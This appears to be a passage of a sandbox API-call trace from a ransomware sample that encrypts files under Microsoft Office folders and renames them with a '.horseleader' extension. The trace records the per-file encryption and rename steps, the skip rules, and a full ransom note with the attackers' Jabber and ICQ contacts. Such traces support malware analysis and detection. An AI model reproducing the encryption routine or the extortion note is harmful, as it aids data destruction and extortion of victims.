(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.820] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.820] CloseHandle (hObject=0x1a4) returned 1 [0244.820] GetProcessHeap () returned 0x780000 [0244.820] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.820] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7941190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0244.820] lstrcmpiW (lpString1="Proof.fr", lpString2="Windows") returned -1 [0244.820] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr") returned 92 [0244.820] lstrcmpW (lpString1="Proof.fr", lpString2=".") returned 1 [0244.820] lstrcmpW (lpString1="Proof.fr", lpString2="..") returned 1 [0244.820] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.820] GetProcessHeap () returned 0x780000 [0244.820] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.820] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\*") returned 94 [0244.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7941190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.822] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.822] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\.") returned 94 [0244.822] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.822] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7941190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.822] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.822] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\..") returned 95 [0244.822] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.822] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.822] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2bd90c0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="Proof.XML", cAlternateFileName="")) returned 1 [0244.822] lstrcmpiW (lpString1="Proof.XML", lpString2="Windows") returned -1 [0244.822] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 102 [0244.822] StrStrIW (lpFirst="Proof.XML", lpSrch=".horseleader") returned 0x0 [0244.822] lstrcmpW (lpString1="Proof.XML", lpString2="#Decrypt#.txt") returned 1 [0244.822] lstrcmpW (lpString1="Proof.XML", lpString2="_uninstalling_.png") returned 1 [0244.822] lstrlenW (lpString=".testttjffg") returned 11 [0244.822] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML", lpSrch=".testttjffg") returned 0x0 [0244.822] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.822] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.823] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.823] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML") returned 102 [0244.823] StrStrW (lpFirst="Proof.XML", lpSrch=".txt") returned 0x0 [0244.823] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1458) returned 1 [0244.823] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5b2, lpOverlapped=0x0) returned 1 [0244.826] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffa4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.826] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5b2, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5b2, lpOverlapped=0x0) returned 1 [0244.826] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.826] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.826] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.826] CloseHandle (hObject=0x15c) returned 1 [0244.826] GetProcessHeap () returned 0x780000 [0244.826] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.826] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.horseleader") returned 114 [0244.826] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\Proof.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\proof.xml.horseleader")) returned 1 [0244.827] GetProcessHeap () returned 0x780000 [0244.827] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.827] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2bd90c0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="Proof.XML", cAlternateFileName="")) returned 0 [0244.828] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.828] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\#Decrypt#.txt") returned 106 [0244.828] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.fr\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.fr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.829] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.829] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.830] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.830] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.830] CloseHandle (hObject=0x1a4) returned 1 [0244.831] GetProcessHeap () returned 0x780000 [0244.831] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.831] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab640f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xab8a250, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Proofing.en-us", cAlternateFileName="PROOFI~1.EN-")) returned 1 [0244.831] lstrcmpiW (lpString1="Proofing.en-us", lpString2="Windows") returned -1 [0244.831] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us") returned 98 [0244.831] lstrcmpW (lpString1="Proofing.en-us", lpString2=".") returned 1 [0244.831] lstrcmpW (lpString1="Proofing.en-us", lpString2="..") returned 1 [0244.831] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.831] GetProcessHeap () returned 0x780000 [0244.831] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.831] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\*") returned 100 [0244.831] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab640f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xab8a250, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.832] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.832] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\.") returned 100 [0244.832] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.832] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab640f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xab8a250, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.832] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.832] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\..") returned 101 [0244.832] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.832] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.832] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf00db300, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="Proofing.XML", cAlternateFileName="")) returned 1 [0244.832] lstrcmpiW (lpString1="Proofing.XML", lpString2="Windows") returned -1 [0244.832] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 111 [0244.832] StrStrIW (lpFirst="Proofing.XML", lpSrch=".horseleader") returned 0x0 [0244.832] lstrcmpW (lpString1="Proofing.XML", lpString2="#Decrypt#.txt") returned 1 [0244.832] lstrcmpW (lpString1="Proofing.XML", lpString2="_uninstalling_.png") returned 1 [0244.832] lstrlenW (lpString=".testttjffg") returned 11 [0244.832] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML", lpSrch=".testttjffg") returned 0x0 [0244.832] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.832] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.833] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.833] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 111 [0244.833] StrStrW (lpFirst="Proofing.XML", lpSrch=".txt") returned 0x0 [0244.833] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=811) returned 1 [0244.833] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x32b, lpOverlapped=0x0) returned 1 [0244.835] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffcd5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.835] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x32b, lpOverlapped=0x0) returned 1 [0244.835] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.836] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.836] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.836] CloseHandle (hObject=0x15c) returned 1 [0244.836] GetProcessHeap () returned 0x780000 [0244.836] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.836] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.horseleader") returned 123 [0244.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.horseleader")) returned 1 [0244.837] GetProcessHeap () returned 0x780000 [0244.837] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.837] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58c6830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xab8a250, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.837] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.837] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\SETUP.XML") returned 108 [0244.837] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.837] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.837] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.838] lstrlenW (lpString=".testttjffg") returned 11 [0244.838] StrStrW 